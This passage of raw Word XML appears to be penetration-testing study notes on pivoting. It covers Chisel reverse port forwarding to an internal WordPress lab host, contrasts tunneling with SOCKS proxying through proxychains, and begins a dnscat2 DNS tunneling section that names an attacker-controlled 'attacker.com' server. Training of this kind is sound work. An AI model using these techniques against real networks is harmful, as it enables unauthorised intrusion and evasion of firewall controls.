          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once Chisel connects, we can browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="467" name="image456.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image456.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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B0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 shows us a WordPress instance (indicated by the URL and title of the page) on INTERNALSRV1. Let's browse to the dashboard login page for WordPress at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1/wordpress/wp-admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and try to log into it with credentials we've discovered so far.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have entered the URL, Firefox displays an error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The navigation bar in Firefox shows that we were redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internalsrv1.beyond.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can assume that the WordPress instance has the DNS name set as this address instead of the IP address. Because our machine doesn't have information about this DNS name, we cannot connect to the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B0F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To be able to fully use the web application, we'll add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internalsrv1.beyond.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId236"/>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fwy2qvximtwb" w:id="93"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling vs. SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B15">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling (Chisel)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = forward traffic to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific internal services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you want to access a specific internal service (e.g., HTTP on port 80)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a fixed "tunnel" between a local and remote host/port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use case:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="725"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use then you want stability or need to browse websites (Chisel is better than proxychains for this)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy (SOCKS5)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = allow access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">many services dynamically</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through tools like proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you want to browse or scan multiple internal targets (like with nmap, curl, or Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Acts like a middleman for any TCP connection, client tells it where to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to scan or browse around inside the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="594"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to run tools like nmap, crackmapexec, or Firefox using proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B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6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B27">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mig1hqsh0qms" w:id="94"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Tunneling with dnscat2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 20.2. DNS Tunneling Theory and Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We use it when Firewall allows UDP/53 (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And you also need a DNS server to be present (with port 53 open) in order to do DNS tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B2F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Machines Involved:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Machine (Client)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – inside a restricted network with no outbound access except DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Resolver (Middleman)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – often an internal or ISP DNS server that forwards DNS queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker-Controlled DNS Server (usually your own Kali Machine) (Authoritative Server)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – controlled by you (e.g., Kali), set up for a domain like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
